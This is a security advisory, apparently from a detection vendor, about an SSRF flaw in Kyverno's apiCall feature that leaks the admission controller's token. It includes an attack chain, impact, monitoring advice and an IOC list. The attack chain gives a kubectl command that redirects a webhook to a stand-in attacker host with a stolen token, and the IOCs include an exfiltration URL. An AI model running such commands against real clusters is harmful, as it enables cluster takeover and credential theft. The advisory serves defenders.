Kyverno apiCall SSRF Leads to Cluster Takeover
A Server Side Request Forgery (SSRF) vulnerability in Kyverno's apiCall feature allows an attacker to exfiltrate the admission controller's ServiceAccount token by creating a ClusterPolicy with a malicious service URL, which can then be used to hijack webhooks, intercept and modify API requests, and potentially access cloud IAM credentials on cloud-hosted clusters, leading to full cluster compromise.
Kyverno, a Kubernetes policy engine, contains a critical vulnerability in its apiCall feature. This feature, designed to enrich policy evaluation with external data, automatically attaches the admission controller's ServiceAccount token to outgoing HTTP requests. The vulnerability stems from a lack of validation of the service URL used in the apiCall specification within a ClusterPolicy. This allows an attacker to specify an arbitrary URL, including attacker-controlled servers. When Kyverno evaluates a policy using the apiCall feature, the admission controller's ServiceAccount token is sent to the attacker's server. The default Helm installation grants the admission controller (kyverno-admission-controller) the ability to PATCH both MutatingWebhookConfiguration and ValidatingWebhookConfiguration resources. This allows an attacker to use the stolen token to hijack webhooks and intercept all API requests, potentially leading to full cluster compromise and credential theft. This vulnerability was tested on Kyverno v1.17.1, but likely affects all versions with apiCall support.
Attack Chain
- An attacker gains the ability to create or modify
ClusterPolicyresources within the Kubernetes cluster, potentially through compromising a service account with sufficient RBAC permissions. - The attacker crafts a malicious
ClusterPolicythat leverages theapiCallfeature. Theservice.urlwithin theapiCallspecification points to an attacker-controlled server. - A Kubernetes resource (e.g., a Pod) is created or modified, triggering the policy evaluation by Kyverno.
- Kyverno's admission controller, while evaluating the policy, makes an HTTP request to the attacker-controlled server, automatically attaching its ServiceAccount token in the
Authorizationheader. - The attacker captures the ServiceAccount token from the HTTP request logs on their server.
- The attacker uses the stolen token to authenticate to the Kubernetes API server.
- The attacker patches the
MutatingWebhookConfigurationand/orValidatingWebhookConfigurationresources, redirecting webhook traffic to an attacker-controlled endpoint.kubectl patch mutatingwebhookconfiguration kyverno-policy-mutating-webhook-cfg --type='json' -p='[{"op":"replace","path":"/webhooks/0/clientConfig/url","value":"https://ATTACKER:443/mutate"}]' --token="eyJhbG..." - All subsequent API requests that trigger the hijacked webhooks are now routed to the attacker's server, allowing them to intercept and modify API requests, inject malicious containers, escalate privileges, and exfiltrate secrets.
Impact
Successful exploitation of this vulnerability allows an attacker to completely compromise the Kubernetes cluster. An attacker can hijack Kyverno's webhooks to intercept and modify all API requests, inject malicious containers into pods, escalate privileges within the cluster, and exfiltrate sensitive data. The attacker can also steal cloud IAM credentials if the token is sent to internal endpoints like http://169.254.169.254/latest/meta-data/ on cloud-hosted clusters (EKS, GKE, AKS). The impact is significant, as it allows for persistent control over the cluster, potentially leading to data breaches, service disruptions, and other severe consequences.
Recommendation
- Monitor Kubernetes audit logs for suspicious
PATCHrequests targetingMutatingWebhookConfigurationorValidatingWebhookConfigurationresources, especially those originating from thekyverno-admission-controllerservice account (see Sigma rule: "Detect Webhook Hijacking"). - Deploy the Sigma rule "Detect Kyverno apiCall to External Domains" to identify potentially malicious
ClusterPolicyresources that use theapiCallfeature to connect to external domains. - Block outgoing connections to the IPs and URLs listed in the IOC table at your network perimeter to prevent token exfiltration.
- Upgrade Kyverno to a patched version that addresses this vulnerability as soon as a fix is released.
Detection coverage 2
Detect Webhook Hijacking
criticalDetects suspicious attempts to patch MutatingWebhookConfiguration or ValidatingWebhookConfiguration, potentially indicating webhook hijacking.
Detect Kyverno apiCall to External Domains
highDetects ClusterPolicy resources that use the apiCall feature to connect to external domains, potentially indicating SSRF attempts.
Detection queries are available on the platform. Get full rules →
Indicators of compromise
1
ip
2
url
| Type | Value |
|---|---|
| ip | 169.254.169.254 |
| url | http://ATTACKER-IP:9999/steal |
| url | https://ATTACKER:443/mutate |